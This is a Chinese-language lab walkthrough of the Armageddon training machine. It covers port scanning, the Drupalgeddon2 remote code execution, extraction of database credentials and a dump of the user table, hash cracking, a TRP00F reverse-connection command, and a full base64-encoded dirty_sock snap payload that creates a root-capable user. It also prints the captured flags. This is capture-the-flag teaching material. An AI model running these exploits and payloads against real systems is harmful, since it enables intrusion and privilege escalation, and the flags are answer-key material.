[Meachines] [Easy] Armageddon Drupal 7 RCE+TRP00F权限提升+Snap dirty_sock权限提升
字数 1242 2025-08-29 08:30:25
Armageddon 靶机渗透测试教学文档
1. 信息收集阶段
1.1 主机发现与端口扫描
ip='10.10.10.233'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//');
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
nmap -Pn -sV -sC -p "$ports" "$ip";
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
fi;
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi
扫描结果:
- 22/tcp: OpenSSH 7.4 (protocol 2.0)
- 80/tcp: Apache httpd 2.4.6 (CentOS) PHP/5.4.16 运行 Drupal 7
1.2 Web应用识别
通过HTTP头信息识别:
- HTTP生成器: Drupal 7 (http://drupal.org)
- 服务器头: Apache/2.4.6 (CentOS) PHP/5.4.16
robots.txt显示36个禁止访问的目录和文件,包括Drupal标准目录结构。
2. 初始入侵 - Drupal 7 RCE (Drupalgeddon 2)
2.1 漏洞利用
使用Drupalgeddon 2漏洞利用脚本:
ruby drupalgeddon2.rb http://10.10.10.233/
2.2 获取数据库凭据
在Drupal配置文件中找到数据库凭据:
cat /var/www/html/sites/default/settings.php
发现凭据:
- 用户名: drupaluser
- 密码: CQHEy@9M*m23gBVj
2.3 数据库操作
列出数据库:
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "SHOW DATABASES;"
导出drupal数据库:
mysqldump -u drupaluser -pCQHEy@9M*m23gBVj drupal > res.txt
提取用户数据:
grep "INSERT INTO \`users\`" res.txt
2.4 破解用户密码
使用John the Ripper破解哈希:
john hash -w rockyou.txt
获得用户密码:booboo
2.5 获取用户标志
用户标志(User.txt):
1afa82c98c5e7cd47410189b10c366d9
3. 横向移动 - TRP00F权限提升
3.1 使用TRP00F工具
python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999
当询问是否要利用pkexec漏洞时选择'y'。
4. 权限提升 - Snap dirty_sock漏洞
4.1 准备环境
安装snapd:
sudo apt install snapd
4.2 生成恶意snap包
使用Python生成base64编码的恶意snap包:
python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256' | base64 -d > exp.snap
4.3 利用漏洞
切换到dirty_sock用户并获取root权限:
su dirty_sock
sudo su
4.4 获取root标志
Root.txt内容:
cc24a5b72cb785d9a58d812e2ba3ea93
5. 关键工具和资源
-
Drupalgeddon 2漏洞利用脚本:
- https://github.com/dreadlocked/Drupalgeddon2/blob/master/drupalgeddon2.rb
-
TRP00F权限提升工具:
- https://github.com/MartinxMax/trp00f
-
Dirty Sock漏洞信息:
- https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
- https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py
6. 总结
本渗透测试过程展示了从Web应用漏洞(Drupalgeddon 2)到系统权限提升(dirty_sock)的完整攻击链。关键点包括:
- 通过Drupal 7的已知RCE漏洞获取初始访问
- 从配置文件泄露中获取数据库凭据
- 通过数据库操作获取用户凭据
- 使用TRP00F进行中间权限提升
- 最终通过Snap的dirty_sock漏洞获取root权限